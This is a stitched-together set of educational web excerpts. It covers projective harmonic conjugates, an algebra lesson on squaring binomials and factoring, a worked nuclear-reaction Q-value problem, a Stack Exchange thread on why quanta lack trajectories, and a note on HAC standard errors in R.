In the case where the conic is a circle, on the extended diameters of the circle, projective harmonic conjugates with respect to the circle are inverses in a circle. This fact follows from one of Smogorzhevsky's theorems:
If circles k and q are mutually orthogonal, then a straight line passing through the center of k and intersecting q, does so at points symmetrical with respect to k.
That is, if the line is an extended diameter of k, then the intersections with q are projective harmonic conjugates.
References
1. ^ R. L. Goodstein & E. J. F. Primrose (1953) Axiomatic Projective Geometry, University College Leicester (publisher). This text follows synthetic geometry. Harmonic construction on page 11
2. ^ Dirk Struik (1953) Lectures on Analytic and Projective Geometry, page 7
3. ^ H. S. M. Coxeter (1942) Non-Euclidean Geometry, page 29, University of Toronto Press
4. ^ B.L. Laptev & B.A. Rozenfel'd (1996) Mathematics of the 19th Century: Geometry, page 41, Birkhäuser Verlag ISBN 3-7643-5048-2
5. ^ John Wesley Young (1930) Projective Geometry, page 85, Mathematical Association of America, Chicago: Open Court Publishing
|
|
## Section 7.5 Special Products and Factors
### Subsection Squares of Monomials
A few special binomial products occur so frequently that it is useful to recognize their forms. This will enable you to write their factored forms directly, without trial and error. To prepare for these special products, we first consider the squares of monomials.
Study the squares of monomials in Example 7.30. Do you see a quick way to find the product?
###### Example 7.30.
1. $(w^5)^2 = w^5 \cdot w^5 = w^{10}$
2. $(4x^3)^2 = 4x^3 \cdot 4x^3 = 4 \cdot 4 \cdot x^3 \cdot x^3 = 16x^6$
###### Look Closer.
In Example 7.30a, we doubled the exponent and kept the same base. In Example 7.30b, we squared the numerical coefficient and doubled the exponent.
###### 1.
Why do we double the exponent when we square a power?
###### Example 7.31.
Find a monomial whose square is $36t^8\text{.}$
Solution
When we square a power, we double the exponent, so $t^8$ is the square of $t^4\text{.}$ Because 36 is the square of 6, the monomial we want is $6t^4\text{.}$ To check our result, we square $6t^4$ to see that $(6t^4)^2=36t^8\text{.}$
### Subsection Squares of Binomials
You can use the distributive law to verify each of the following special products.
\begin{align*} (a+b)^2 \amp =(a+b)(a+b) \amp \amp \amp (a-b)^2 \amp =(a-b)(a-b)\\ \amp = a^2+ab+ab+b^2 \amp \amp \amp \amp =a^2-ab-ab+b^2\\ \amp = a^2+2ab+b^2 \amp \amp \amp \amp =a^2-2ab+b^2 \end{align*}
###### Squares of Binomials.
1. $\blert{(a+b)^2=a^2+2ab+b^2}$
2. $\blert{(a-b)^2=a^2-2ab+b^2}$
###### 2.
Explain why it is NOT true that $(a+b)^2=a^2+b^2\text{.}$
We can use these results as formulas to compute the square of any binomial.
###### Example 7.32.
Expand $~(2x+3)^2~$ as a polynomial.
Solution
The formula for the square of a sum says to square the first term, add twice the product of the two terms, then add the square of the second term. We replace $a$ by $2x$ and $b$ by $3$ in the formula.
\begin{align*} (a+b)^2 \amp = a^2 ~~~~~~ + ~~~~~~ 2 a b~~~~~~ + ~~~~~~b^2\\ (2x+3)^2 \amp = (2x)^2 + ~~2 (2x)(3) + ~~~(3)^2\\ \amp ~~\blert{\text{square of}} ~~~~~ \blert{\text{twice their}} ~~~~~ \blert{\text{square of}}\\ \amp ~~\blert{\text{first term}} ~~~~~~~ \blert{\text{product}} ~~~~~ \blert{\text{second term}}\\ \amp = 4x^2 ~~~~ + ~~~~~~ 12x ~~~~~ + ~~~~~ 9 \end{align*}
Of course, you can verify that you will get the same answer for Example 7.32 if you compute the square by multiplying $(2x+3)(2x+3)\text{.}$
###### Caution 7.33.
We cannot square a binomial by squaring each term separately! For example, it is NOT true that
\begin{equation*} (a+b)^2 = a^2+b^2 \end{equation*}
We must use the distributive law to multiply the binomial times itself.
###### 3.
How do we compute $(a+b)^2\text{?}$
### Subsection Difference of Two Squares
Now consider the product
\begin{equation*} (a+b)(a-b) = a^2 - ab + ab - b^2 \end{equation*}
In this product, the two middle terms cancel each other, and we are left with a difference of two squares.
###### Difference of Two Squares.
\begin{equation*} \blert{(a+b)(a-b)=a^2-b^2} \end{equation*}
###### Example 7.34.
Multiply $~(2y+9w)(2y-9w)~$
Solution
The product has the form $(a+b)(a-b)\text{,}$ with $a$ replaced by $2y$ and $b$ replaced by $9w\text{.}$ We use the difference of squares formula to write the product as a polynomial.
\begin{align*} (a+b)(a-b) \amp = ~~a^2 ~~~~~~ - ~~~~~~b^2\\ (2y+9w)(2y-9w) \amp = (2y)^2 ~~ - ~~~(9w)^2\\ \amp ~~\blert{\text{square of}} ~~~~~ \blert{\text{square of}}\\ \amp ~~\blert{\text{first term}} ~~~~~ \blert{\text{second term}}\\ \amp = 4y^2 ~~~~ - ~~~~~ 81w^2 \end{align*}
###### 4.
Explain the difference between $(a-b)^2$ and $a^2-b^2\text{.}$
### Subsection Factoring Special Products
The three special products we have just studied are useful as patterns for factoring certain polynomials. For factoring, we view the formulas from right to left.
###### Special Factorizations.
1. $\blert{a^2+2ab+b^2=(a+b)^2}$
2. $\blert{a^2-2ab+b^2=(a-b)^2}$
3. $\blert{a^2-b^2=(a+b)(a-b)}$
If we recognize one of the special forms, we can use the formula to factor it. Notice that all three special products involve two squared terms, $a^2$ and $b^2\text{,}$ so we first look for two squared terms in our trinomial.
###### Example 7.35.
Factor $~x^2+24x+144$
Solution
This trinomial has two squared terms, $x^2$ and $144\text{.}$ These terms are $a^2$ and $b^2\text{,}$ so $a=x$ and $b=12\text{.}$ We check whether the middle term is equal to $2ab\text{.}$
\begin{equation*} 2ab=2(x)(12) = 24x \end{equation*}
This is the correct middle term, so our trinomial has the form (1), with $a=x$ and $b=12\text{.}$ Thus,
\begin{align*} a^2+2ab+b^2 \amp = (a+b)^2 \amp \amp \blert{\text{Replace}~a~\text{by}~x~\text{and}~b~ \text{by}~12.}\\ x^2+24x+144 \amp = (x+12)^2 \end{align*}
###### 5.
How can we factor $a^2- 2ab + b^2\text{?}$
###### 6.
How can we factor $a^2- b^2\text{?}$
###### Caution 7.36.
The sum of two squares, $a^2+b^2\text{,}$ cannot be factored! For example,
\begin{equation*} x^2+16,~~~~~~9x^2+4y^2,~~~~~~\text{and}~~~~~~25y^4+w^4 \end{equation*}
cannot be factored. You can check, for instance, that $x^2+16 \not= (x+4)(x+4)\text{.}$
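Carrying out the suggested check explicitly (a short verification, not in the original text): squaring the candidate factor produces an unavoidable middle term,
\begin{equation*} (x+4)(x+4) = x^2+4x+4x+16 = x^2+8x+16 \ne x^2+16 \end{equation*}
and no choice of binomial factors can produce both square terms without some middle term appearing.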
###### Sum of Two Squares.
The sum of two squares, $~a^2+b^2~\text{,}$ cannot be factored.
As always when factoring, we should check first for common factors.
###### Example 7.37.
Factor completely $~98-28x^4+2x^8$
Solution
Each term has a factor of 2, so we begin by factoring out 2.
\begin{equation*} 98-28x^4+2x^8 = 2(49-14x^4+x^8) \end{equation*}
The polynomial in parentheses has the form $(a-b)^2\text{,}$ with $a=7$ and $b=x^4\text{.}$ The middle term is
\begin{equation*} -2ab=-2(7)(x^4)=-14x^4 \end{equation*}
We use equation (2) to write
\begin{align*} a^2-2ab+b^2 \amp = (a-b)^2 \amp \amp \blert{\text{Replace}~a~\text{by}~7~\text{and}~b~ \text{by}~x^4.}\\ 49-14x^4+x^8 \amp = (7-x^4)^2 \end{align*}
Thus,
\begin{equation*} 98-28x^4+2x^8 = 2(7-x^4)^2 \end{equation*}
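We can verify the complete factorization by expanding (a quick check, not shown in the text):
\begin{equation*} 2(7-x^4)^2 = 2(49-14x^4+x^8) = 98-28x^4+2x^8 \end{equation*}
which is the original polynomial.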
###### 7.
What expression involving squares cannot be factored?
### Subsection Skills Warm-Up
#### Exercises
Express each product as a polynomial.
###### 1.
$(z-3)^2$
###### 2.
$(x+4)^2$
###### 3.
$(3a+5)^2$
###### 4.
$(2b-7)^2$
###### 5.
$(2n-5)(2n+5)$
###### 6.
$(4m+9)(4m-9)$
### Exercises Homework 7.4
###### 1.
Square each monomial.
1. $(8t^4)^2$
2. $(-12a^2)^2$
3. $(10h^2k)^2$
###### 2.
Find a monomial whose square is given.
1. $16b^{16}$
2. $121z^{22}$
3. $36p^6q^{24}$
For Problems 3–4, write the area of the square in two different ways:
1. as the sum of four smaller areas,
2. as one large square, using the formula Area = (length)$^2\text{.}$
###### 4.
For Problems 5–7, compute the product.
###### 5.
$(n+1)(n+1)$
###### 6.
$(m-9)(m-9)$
###### 7.
$(2b+5c)(2b+5c)$
For Problems 8–13, compute the product.
###### 8.
$(x+1)^2$
###### 9.
$(2x-3)^2$
###### 10.
$(5x+2y)^2$
###### 11.
$(3a+b)^2$
###### 12.
$(7b^3-6)^2$
###### 13.
$(2h+5k^4)^2$
For Problems 14–19, use the formula for difference of two squares to multiply.
###### 14.
$(x-4)(x+4)$
###### 15.
$(x+5z)(x-5z)$
###### 16.
$(2x-3)(2x+3)$
###### 17.
$(3p-4)(3p+4)$
###### 18.
$(2x^2-1)(2x^2+1)$
###### 19.
$(h^2+7t)(h^2-7t)$
###### 20.
$-2a(3a-5)^2$
###### 21.
$4x^2(2x+6y)^2$
###### 22.
$5mp^2(2m^2-p)(2m^2+p)$
For Problems 23–25, factor the squares of binomials.
###### 23.
$y^2+6y+9$
###### 24.
$m^2-30m+225$
###### 25.
$a^6-4a^3b+4b^2$
For Problems 26–31, factor.
###### 26.
$z^2-64$
###### 27.
$1-g^2$
###### 28.
$-225+a^2$
###### 29.
$x^2-9$
###### 30.
$36-a^2b^2$
###### 31.
$64y^2-49x^2$
For Problems 32–40, factor completely.
###### 32.
$a^4+10a^2+25$
###### 33.
$36y^8-49$
###### 34.
$16x^6-9y^4$
###### 35.
$3a^2-75$
###### 36.
$2a^3-12a^2+18a$
###### 37.
$9x^7-81x^3$
###### 38.
$12h^2+3k^6$
###### 39.
$81x^8-y^4$
###### 40.
$162a^4b^8-2a^8$
###### 41.
Is $(x-3)^2$ equivalent to $x^2-3^2\text{?}$ Explain why or why not, and give a numerical example to justify your answer.
###### 42.
Use areas to explain why the figure illustrates the product $(a+b)^2 = a^2+2ab+b^2.$
###### 43.
Use evaluation to decide whether the two expressions $(a+b)^2$ and $a^2+b^2$ are equivalent.
| $a$ | $b$ | $a+b$ | $(a+b)^2$ | $a^2$ | $b^2$ | $a^2+b^2$ |
| --- | --- | --- | --- | --- | --- | --- |
| $2$ | $3$ | | | | | |
| $-2$ | $-3$ | | | | | |
| $2$ | $-3$ | | | | | |
###### 44.
Explain why you can factor $x^2-4\text{,}$ but you cannot factor $x^2+4\text{.}$
###### 45.
1. Expand $(a-b)^3$ by multiplying.
2. Use your formula from part (a) to expand $(2x-3)^3$
3. Substitute $a=5$ and $b=2$ to show that $(a-b)^3$ is not equivalent to $a^3-b^3\text{.}$
###### 46.
1. Multiply $(a+b)(a^2-ab+b^2)\text{.}$
2. Factor $a^3+b^3$
3. Factor $x^3+8\text{.}$
|
|
# Help:Contents
Making a list is as simple as this, just look at the edit
• First level
• second level
• third level
Help starting a new page
Getting technical now $\sqrt{1-e^2}$
|
|
# The nuclear reaction $\;n + _{5}^{10}B \to _{3}^{7}{Li}+_{2}^{4}He\;$ is observed to occur when very slow-moving neutrons $\;(M_{n}=1.0087\ u)\;$ strike a boron atom at rest. For a particular reaction in which $\;K_{n} \approx 0\;,$ the helium $\;(M_{He}=4.0026\ u)\;$ is observed to have a speed of $\;9.30\times 10^{6}\ m/s\;.$ Taking into account the kinetic energy of the lithium $\;(M_{Li}=7.016\ u)\;,$ find the Q value of the reaction.
$(a)\;1.42 MeV\qquad(b)\;3 MeV\qquad(c)\;2 MeV\qquad(d)\;2.82 MeV$
Answer : (d) $\;2.82 MeV$
Explanation :
We are given $\;K_{n} \approx K_{B} \approx 0\;$ (the neutron is very slow and the boron atom is at rest).
So $\;Q=K_{Li}+K_{He}$
Where $\;K_{He}=\large\frac{1}{2}\;M_{He}v_{He}^{2}=\large\frac{1}{2}\;(4.0026 u)\;(1.66\times10^{-27}\ kg/u)\times(9.30\times10^{6}\ m/s)^2$
$=2.87 \times 10^{-13} J =1.8 MeV$
By conservation of momentum $\;p_{Li}=p_{He}\;$, so $\;K_{Li}=\large\frac{p^{2}}{2M_{Li}}\;=K_{He}\,\large\frac{M_{He}}{M_{Li}}\;=(1.8 MeV)\times\large\frac{4.0026}{7.016}\;=1.02 MeV$
Hence $\;Q=1.02 MeV + 1.8 MeV = 2.82 MeV\;.$
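The arithmetic can be checked with a few lines of Python (a quick sketch using the same constants as the solution: $1\,u = 1.66\times10^{-27}$ kg and $1\,\mathrm{MeV} = 1.602\times10^{-13}$ J):

```python
# Numeric check of the Q-value computation above.
u_kg = 1.66e-27          # kg per atomic mass unit
MeV_J = 1.602e-13        # joules per MeV

M_He, M_Li = 4.0026, 7.016   # masses in u
v_He = 9.30e6                # helium speed, m/s

K_He = 0.5 * M_He * u_kg * v_He**2 / MeV_J   # kinetic energy of He, MeV
K_Li = K_He * M_He / M_Li                    # from momentum conservation
Q = K_He + K_Li
print(round(K_He, 2), round(K_Li, 2), round(Q, 2))   # → 1.79 1.02 2.82
```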
|
|
# What does it mean “not to have a definite trajectory”?
In a comment to my question someone stated the following:
"photons do not travel at some definite number of oscillations per second. In fact, they do not "travel" at all, no more than electrons or other quanta do, as by the Uncertainty Principle they don't have a definite speed and/or trajectory"
Nobody objected or denied it, can someone explain what that actually means?
• Does it mean that they do not have a definite/straight/regular trajectory and wander erratically, or that they have no trajectory at all? Can you try to describe their motion graphically?
It is generally thought that QM describes weird things, laws and phenomena that are quite different from the macroscopic world. Can you be precise about one feature, please, i.e. whether it respects the basic old tenet "Natura non facit saltus":
• Does QM allow a particle to disappear from a point and reappear at another point that is not contiguous with it? If so, what is the explanation?
A photon is a name given to a lump in an electromagnetic field that can cause a single electron to change from one energy level to another. The size of the lump in a given region tells you the probability that it will make an electron change its energy level. The first thing to note about such a lump is that it doesn't have a single location. Rather, it is spread over an extended region. Now, it can be the case that if you track the evolution of the field over time, a lump in some region R1 can give rise to another lump in some other region R2. But you can't pick a particular point x1 in R1 and say that the field at x1 gave rise to the field at a point x2 in R2. Rather, the lump in R1 gave rise to the lump in R2. If you change the shape of the lump in R1 away from x1 this will in general change the probability of observing something in a sub region of R2 around x2. So you can't say the photon travels along some trajectory from x1 to x2.
And what I have said above is only an approximation because in general you can't localise a field so that it only has a non-zero value in some bounded region. The best you can do is change the field so that you will have a higher probability of seeing a photon in some region.
The above discussion alone would mean that a photon doesn't have a trajectory, but in general the situation is even less trajectory friendly than that. Different photons with the same energy aren't distinguishable: all you can say is "there are so many lumps in the field in this region". If you have some region R3 at t2 and there are lumps in R1 and R2 at t1, both of which are within $c(t_2-t_1)$ of R3, then there is in general no fact of the matter about whether the lump at R3 corresponds to the lump at R1 or R2, since they both contribute to R3 and all you can measure is something like the number of lumps.
If you want to understand this issue properly you should read about quantum field theory. A good book about QFT is "Quantum field theory for the gifted amateur" by Lancaster and Blundell.
More explanation. The OP asks if the particle can be in two places at once. Suppose that the field in a particular region is such that you have a very high probability of only measuring one particle in some given period of time. In general you will not be able to explain the results of experiments in that region by saying the particle has gone down one particular trajectory. Changes in different places in that region will all change the final outcome of the experiment. You could say the particle is in more than one place at a time in that sense. The particle doesn't appear or disappear from one place or another in the region. Rather, the field changes gradually over time so that the particle changes its probability of being in different places.
• The electron in H ground state is everywhere at a given t? If not, if it does indeed move, how does it move without a trajectory? Can it be in two places at one time? Can it disappear in one place and reappear in another place, skipping space-points in-between, according to QM? – user104372 Feb 17 '16 at 12:14
• "Lump mechanics"? I like it! :-) – CuriousOne Feb 17 '16 at 12:25
• @user104 see the explanation in the paragraph added in the answer above – alanf Feb 17 '16 at 12:45
• So could we say that a laser forms a line of lumps, the first lumps forming right next to the device itself causing subsequent lumps to be formed next to the first lumps and so on? And the lumps propogate at the speed of light? And when the laser is switched off the lumps collapse starting at the laser end and the collapsing happens at the speed of light? – Todd Wilcox Feb 17 '16 at 17:30
• No. The laser forms a field, which when measured or interacted with in a certain way looks like lumps. To say the laser beam is made of lumps is a bit like looking at an object at an angle and saying that the object is made out of all the ways you can look at it at an angle. – alanf Feb 17 '16 at 23:19
It means that quanta are not "bodies" in the sense of classical mechanics. Let's review the necessary definitions:
A "body" is defined as an extended piece of matter.
A "particle" is the approximation that a body can be described by the motion of its center of mass, so that we don't have to care about either size, shape or composition of the body.
A "trajectory" is the time dependent position vector of that center of mass.
Quanta (like photons and electrons) are neither bodies nor particles in this sense (because they don't behave like either) and they do not have trajectories.
Now, one can analyze quantum mechanics in terms of "paths", but those are not the paths that you keep hearing about when people are poorly discussing things like the double slit experiment. Instead, one can reformulate the Schroedinger equation (and the equations of quantum field theory) into an integral formulation, where the propagator can be described by a so called "path integral". This path integral is the summation of the complex exponential of the classical action S over all possible geometric paths that connect the initial to the final state.
The path integral is a pretty hard to use mathematical formalism if one attacks it directly, but it can be expressed as a perturbation series... those are the Feynman diagrams that you may have seen.
So what are quanta then, you may ask?
A quantum is the smallest unit of measurement on a quantum field. No matter what we do to that field, it will never interact in any other way than by exchanging a quantum with us.
Practically this means that we can initialize a quantum field with a finite number of quanta at the beginning of an experiment and we can measure a finite number of quanta at the end of it. The initial state is a configuration of quanta and the final state is a configuration of quanta. The dynamical theory of the field tells us what the probability distributions for final configurations of quanta will be when we keep repeating the same experiment over and over, again. Whatever we do, though, we can not assume that the quanta we put in have travelled on some paths from the initial state to the quanta of the final state.
Why is that so? Because in quantum field theory the number of quanta is simply not a constant and even if it was, quanta are not distinguishable. We can't label them Q1, Q2, Q3 and expect to see three labeled quanta to come out at the end. Instead nature can make some of them disappear or add some. More importantly, though, all the propagation of identical quanta will follow either the symmetry of bosons (i.e. only wave functions that are fully symmetric in all bosons appear) or fermions, which means that all wave functions have to be antisymmetric in the fermionic quanta.
So why do we see all this talk about "particles" in quantum mechanics? Because (beginners level) quantum mechanics is really a non-relativistic single quantum theory. It avoids all the mathematical problems with relativistic quantum field theory and can make reasonable statements about systems with low energy bound states and low energy scattering. We don't have to worry about ever seeing more or fewer quanta than we have put in, and it pretends to have a simple interpretation in terms of "particles". That, unfortunately, is somewhat of a mirage, and it actually pays not to waste any effort on trying to reach the promised oasis of an interpretation of quantum theory where "particles" move on well defined "paths". That is (and always was) a nonsensical misunderstanding/misstatement of the theory that stems from its beginnings in the 1900s-1920s. By 1930 physicists had understood that single particle quantum mechanics was not sufficient to describe nature, and by the late 1940s quantum field theory was blooming. At that point, latest, one should have stopped using the wrong concepts even in non-relativistic quantum mechanics. For whatever reason (probably because it seems to be easier to teach it that way) inertia has won out, and students are still too often being forced to learn one version of QM first, before they basically have to re-learn the same thing, again, this time with the proper concepts. Those who never reach the level of even rudimentary understanding of relativistic fields are stuck with the wrong mental picture about quanta and particles.
To answer your questions directly: quanta don't have trajectories and it does not make sense to try to define any for them. "Particles" don't disappear and they do not reappear. What high energy physicists call "particles" are high momentum states that are being subjected to weak position measurements in particle detectors. It can be shown that under these circumstances reasonably straight "tracks" (not paths!) will appear in detectors. QM textbooks may glance over the phenomenological difference by showing particle tracks without explaining that a particle detector never even comes close to probing the quantum regime for the momentum/position uncertainty. What these detectors are built for are charge, momentum/energy and mass measurements (occasionally also for spin), but they are essentially classical devices.
• Could I get some feedback from the downvoter what is technically false about this description? I am really curious. – CuriousOne Feb 17 '16 at 11:31
• In the usual interpretation, an electron/photon is not a quantum. The measured quantities characterizing a system - i.e. the observables - may (but not always) have quantized (discrete) numerical values. The "fundamental" (in the right scale) constituents of a quantum system may be described mathematically by some suitable set of observables and/or fields (that are observables as well), but the interpretation of them is still of (more or less) tangible objects. – yuggib Feb 17 '16 at 11:36
• As far as I know, the word quanta have been introduced to describe the discreteness of the spectrum of some observables (already in non-relativistic QM), and not to refer to the fundamental constituents of the system under examination. – yuggib Feb 17 '16 at 11:37
• @yuggib: If by "usual interpretation" you mean the technically incorrect explanation of quantum mechanics that you can find in so many textbooks, then you are correct. That shouldn't stop us from giving the OP the correct explanation, instead. Falsehoods have no protection because of their popularity. The only way for quantum systems to interact (and to exist in the first place) is by means of quantum fields. There is nothing else. – CuriousOne Feb 17 '16 at 11:38
• It is just a matter of terminology, but an important one. I agree that you need to introduce the quantum fields to describe relativistic quantum mechanics. But "quantum" means a definite discrete quantity (as opposed to the continuum), and it is related to the spectral behavior of some observables rather than to particles. "Particle" come from the latin word for tiny object, and so is more suitable to define the fundamental constituent of a physical system. Again, I agree that in relativistic quantum mechanics this constituent is described by an operator (the field) rather than... – yuggib Feb 17 '16 at 11:43
tl;dr: This is really just a verbose synthesis of what has already been said by alanf and CuriousOne, with a more basic experiment-and-theory approach and a smattering of my own limited knowledge.
The upshot is the same: trajectories make little sense in nonrelativistic QM and if you factor in QFT, you can't even speak about particles.
The problem here is that our intuition is ill-defined when it comes to quantum mechanics. In particular, a "particle" is ill-defined. A second problem is that there are two sides to this question: theory and experiments - and another problem is that quantum experiments are much more difficult on a fundamental level.
Experimental Trajectories
Let's start with experiments (one should always start there, right?) and suppose we know what a "particle" is. Now, for classical physics, we can all agree that a body has a nice trajectory like a football shot on a goal. When you ask people whether quantum particles have trajectories, they will point to bubble chamber trajectories and voilà, there are clear particle trajectories. Or they might point you to particle accelerators, where particle trajectories are visualised. As mentioned in another answer, the trouble is that the quantum particles here have very high energy. If the amount of energy involved is very high, the particle, albeit tiny, will behave classically as far as we are concerned.
Thus, in order to see the "true" quantum world, this won't do. You'll have to think of low energy particles - maybe electrons in an atom or such. When you want to look at the "trajectory" of such a particle, you'll already be in trouble: you can't just shine light at it and watch it move - any photon with a moderately high energy will just ionize the atom and completely change whatever "trajectory" you wanted to look at. And even if you don't ionize the atom, you'll still heavily influence the path. If you want to "watch" a photon, you could use photo-detectors to measure the exact place where the photon is - but afterwards, it'll be destroyed, so that's also no good for measuring a trajectory.
First lesson: What you can do is already limited to one measurement of position or momentum. Everything after that just won't make much sense any more.
From Experiment to Theory
Now you might be clever and think: I can just set up an experiment where I send an electron time and time again, and if I keep everything else fixed, every electron will have the exact same trajectory (this is what we expect from classical physics), and then I can just measure the trajectory by measuring speed and/or position at different places.
This is where the Heisenberg uncertainty jumps in and tells you that the result will never be a single trajectory. However hard you try, there will be a fundamental distribution of the results. If you measure "one" trajectory (meaning you prepare an electron, measure its position after time $t_1$, then reprepare, measure after $t_2$ and so on), you'd get an erratic behaviour. If you repeat the measurements at every point, you'd get a distribution of results. This is one way to say "particles don't have a trajectory".
Second Lesson: Repeating an experiment won't help - the outcome will be a probabilistic trajectory, not something you'd normally call a "trajectory".
However, what you can observe is how motion is built up: The probability of where to find the particle changes over time as does the speed. If you think you are sending a particle along some linear trajectory, what you will observe if done right is that the particle will "probably" move along this trajectory.
Nonrelativistic Quantum Mechanics
You can even go further: If you look into quantum mechanics (which can perfectly describe anything I have just talked about), in the scenario of an electron moving along some path* we have Ehrenfest's theorem, which tells us that the expectation value of position and momentum behave like a classical particle in classical mechanics: the expectation value has a classical trajectory! Note however that since the probability distributions are not very sharp, we cannot say the same for a single particle.
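Concretely (this display is my addition, not part of the original answer): for a particle of mass $m$ in a potential $V(x)$, Ehrenfest's theorem states

```latex
\frac{d}{dt}\langle \hat{x}\rangle = \frac{\langle \hat{p}\rangle}{m},
\qquad
\frac{d}{dt}\langle \hat{p}\rangle = -\,\bigl\langle V'(\hat{x})\bigr\rangle .
```

Note that $\langle V'(\hat{x})\rangle \neq V'(\langle \hat{x}\rangle)$ in general; only for potentials that are at most quadratic do the expectation values obey exactly the classical equations of motion.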
In nonrelativistic quantum mechanics, people tend to interpret this (and some other results together) as meaning that no particle really has a well-defined position and/or momentum. For large momenta (i.e. large energies) or large particles this doesn't really matter because the probability distributions become very sharp, but for our electron at low speed it does. This doesn't mean that the position is just a bit uncertain, it means that asking for a position of a particle when you don't measure it doesn't make sense. Note that this is a theoretical statement. If you don't measure, you can't really say anything, but using measurements you can rule out simple theories where a position and momentum are well-defined.
Third lesson: Mostly, people interpret quantum theory to imply that drawing the movement of a particle doesn't make sense. The particle moves neither along an erratic nor a straight trajectory, and it also doesn't magically disappear at a point and reappear at another. The question "What does the movement look like?" just doesn't make sense (and you will always fail when you answer it experimentally).
Can we get around this?
Yes. Bohmian mechanics, a different yet equivalent interpretation of nonrelativistic quantum mechanics, assigns each particle a definite position and trajectory, guided by a "pilot wave". The trajectories are governed by hidden variables (i.e. variables to which we have no experimental access). Note that the predictions of Bohmian mechanics and canonical quantum mechanics are the same; it is (so far) only a reinterpretation of the theory.
However, let me warn you: Bohmian mechanics has many problems of its own, not least that (as of now) it cannot really make sense out of QFT.
More theory and philosophy
So far I have talked about particles and nonrelativistic quantum mechanics. As pointed out by other answers here, the story gets even more complicated with QFT (from the classical intuition - it actually gets simpler in a certain way).
You seem to believe that there are particles and a massive particle must of course have a place where you can find it. There is a rest frame for the particle, so I could just go and have a look at it. Sadly, that's not quite true. The fundamental objects in quantum field theory are not particles, they are fields and their excitations. The connection to experiments is the rule that a quantity in an experiment corresponds to a self-adjoint operator and the values that the experiment will give are elements of the spectrum of that operator. Quantum fields have a ground state and every other possible state is an excited state. Very often, the results of the measurement are discrete ("quanta") and therefore, so are the excitations. Often, people therefore call these excitations "particles". The excitation of the electromagnetic field is a "photon" and there are quantum fields where the excitation is an "electron". However, we have a problem: these "particles" are not really what we think of as particles. They might not be localised, i.e. they really don't need to have a "position": if you look at the values of the field everywhere, it might be that the excitation is very spread out and there is no place where you could really say "here is the particle". They might be somewhat localised and look like "lumps", or they might not be. In a sense, the orbital of an atom is a visualisation of the electron-excitation. And looking at such an orbital, I wouldn't really call it a particle, because - well, for one, because it doesn't have a well-defined position.
And this is a basic problem of quantum field theory: Excitations are rarely localised. Talking about particles as localised objects with definite properties will only ever (partially) make sense in the absence of interaction. There are mathematical results to back this up (see this entry in the Stanford encyclopedia to learn more about the ontology of QFT).
Last lesson: In other words: since we can't even define particles (localised objects), we don't even have to care how they move from point to point or what their trajectory looks like - none of these questions has meaning. The only thing that we can talk about is the probability density corresponding to observables with respect to quantum fields. We can ask how they evolve (this is answered by QFT) and we can have a look at asymptotic behaviour and how classicality emerges.
Last but not least: In the LHC experiments alluded to earlier, we can now say a bit more: after the collision, we have a bunch of excitations with a very high energy. They are already in the asymptotic regime: the detectors interact only weakly with those particles and therefore they behave very much like particles. Since in addition their energy is quite high, their probability densities are very sharp, so that they really do trace out what looks like a particle trajectory. The interesting part of course is the collision - where the interaction is certainly not small. At that point, we cannot make sense of the word "particle".
*(see how intuition dictates how I have to write this sentence? I'm trying to explain that the sentence doesn't quite make sense, yet have to write it down to explain the scenario...)
• It's implied but I think it should be made clear that at the point of collision is perhaps the only place where we can definitely say: here the particle was - interactions such as collisions collapse the probabilities to a definite point in space – slebetman Feb 17 '16 at 19:17
Yes, also check out Bell's Theorem, which is brilliantly described in Brian Greene's "The Fabric of the Cosmos". In the case of a single stream of photons being beamed one at a time, they make a wave-like pattern. Each individual particle is a wave -- that's why they don't have a definite trajectory. In fact, you can't think of any single quantum (particle) as being in a specific location.... It's not because we can't know the location or because it might be in some other location... in fact, there is no specific location in space-time where a particle "is", until the effects of an interaction propagate, which show the particle at one specific trajectory where that particle "could have been". It is in quotes because Bell's experiments demonstrate that the particle really was in a superposition (a fancy way of saying it is in more than one place at once) -- right up until the "decoherence" when we can prove that it interacted with other particles from a specific location.
• My question refers to electrons, and they do have mass, so.. they must occupy space, and only one space at a time, and they should pass from one point to the next and only to a next point. They do progress like a wave, but a wave is indeed a trajectory, too – user104372 Feb 17 '16 at 15:29
• @user104: Think of it this way - until an electron interacts with another "thing" (usually this is called "observed") it doesn't occupy a definite space but rather a statistical/probabilistic range of space. That a single electron can cause interference with itself tells us that the probabilities do not mean we don't know (like the outcome of a die); it means it actually occupies all the space according to the probabilities (like multiple virtual particles travelling together). – slebetman Feb 17 '16 at 19:10
• @user104 "x has mass, so x must occupy (behave as if it occupies) a particular single point in space and pass from one point to the next" is simply not true, on small scales our reality behaves in ways that contradict this. Electron "orbits" around atoms are a great example. In many cases, the concept of a trajectory is a very useful simplification but not always - the meaning of "x does not have a definite trajectory" is "as some cases show, the whole concept that 'stuff' or 'mass' has 'location' or 'trajectory' is conceptually wrong and not consistent with the physical reality we live in". – Peteris Feb 18 '16 at 1:55
• "they do have mass, so.. they must occupy space, and only one space at a time" - that makes sense but experiments show that it's wrong. – emery Feb 19 '16 at 15:04
## 15.4 HAC Standard Errors
The error term $u_t$ in the distributed lag model (15.2) may be serially correlated due to serially correlated determinants of $Y_t$ that are not included as regressors. As long as these factors are not correlated with the regressors included in the model, serially correlated errors do not violate the assumption of exogeneity, so the OLS estimator remains unbiased and consistent.
However, autocorrelated errors render the usual homoskedasticity-only and heteroskedasticity-robust standard errors invalid and may cause misleading inference. HAC standard errors are a remedy.
### HAC Standard Errors
Problem:
If the error term $u_t$ in the distributed lag model (15.2) is serially correlated, statistical inference that rests on usual (heteroskedasticity-robust) standard errors can be strongly misleading.
Solution:
Heteroskedasticity- and autocorrelation-consistent (HAC) estimators of the variance-covariance matrix circumvent this issue. There are R functions like vcovHAC() from the package sandwich which are convenient for computation of such estimators.
The package sandwich also contains the function NeweyWest(), an implementation of the HAC variance-covariance estimator proposed by Newey and West (1987).
